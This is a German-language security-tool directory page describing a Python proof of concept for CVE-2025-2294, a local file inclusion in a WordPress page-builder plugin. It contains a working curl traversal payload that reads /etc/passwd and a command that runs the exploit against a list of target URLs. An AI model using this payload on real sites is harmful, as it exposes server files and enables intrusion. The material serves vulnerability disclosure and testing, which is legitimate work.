Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-2294 — Python-PoC für CVE-2025-2294, eine nicht authentifizierte Local File Inclusion im Kubio AI Page Builder WordPress-Plugin (≤2.5.1), die beliebige Dateioffenlegung und potenzielle Remote-Code-Ausführung demonstriert. | Kitploit
Tools/GitHubGitHub/0xwhoami35/cve-2025-2294
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungWebsicherheitPenetrationstests
GitHub0xwhoami35/cve-2025-2294

CVE-2025-2294

Python-PoC für CVE-2025-2294, eine nicht authentifizierte Local File Inclusion im Kubio AI Page Builder WordPress-Plugin (≤2.5.1), die beliebige Dateioffenlegung und potenzielle Remote-Code-Ausführung demonstriert.

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-2294

🚨 CVE-2025-2294 - Lokale Dateieinbindung (LFI) Schwachstelle im Kubio AI Page Builder für WordPress 🧱

🔍 Überblick

CVE-2025-2294 ist eine kritische 🔥 Local File Inclusion (LFI)-Schwachstelle, die das Kubio AI Page Builder Plugin für WordPress (Versionen bis einschließlich 2.5.1) betrifft. Dieser Fehler ermöglicht es nicht authentifizierten Remote-Angreifern 👾, beliebige Dateien auf dem Server über den URL-Parameter __kubio-site-edit-iframe-classic-template einzubinden.

Das Ausnutzen dieser Schwachstelle kann zur Offenlegung sensibler Dateien 📂, zur Ausführung von Remote-Code 💥 und zur vollständigen Kompromittierung des Systems 💀 führen.

👤 Autor

Muhammad Nizar — Sicherheitsforscher 🔐
GitHub: 0xWhoami35
YouTube: InfoSec Insight ▶️


Bei Fragen oder für Zusammenarbeit einfach melden! 🤝


📋 Betroffene Versionen

  • Kubio AI Page Builder plugin ≤ 2.5.1 🛠️

🧰 Verwendung

Führe das Exploit-Skript mit einer Liste von Ziel-URLs aus:

root@kitploit:~
python3 lfi.py -l list.txt

⚠️ Schwachstellendetails

  • Typ: Local File Inclusion (LFI) 🕳️
  • Schweregrad: Kritisch (CVSS 9.8) 🔥
  • Angriffsvektor: Remote, nicht authentifiziert 🌐
  • Auswirkungen: Vertraulichkeit, Integrität, Verfügbarkeit 🔐

🧪 Proof of Concept (PoC)

root@kitploit:~
curl "https://target-website.com/?__kubio-site-edit-iframe-preview=true&__kubio-site-edit-iframe-classic-template=../../../../../../../etc/passwd"
Tool herunterladen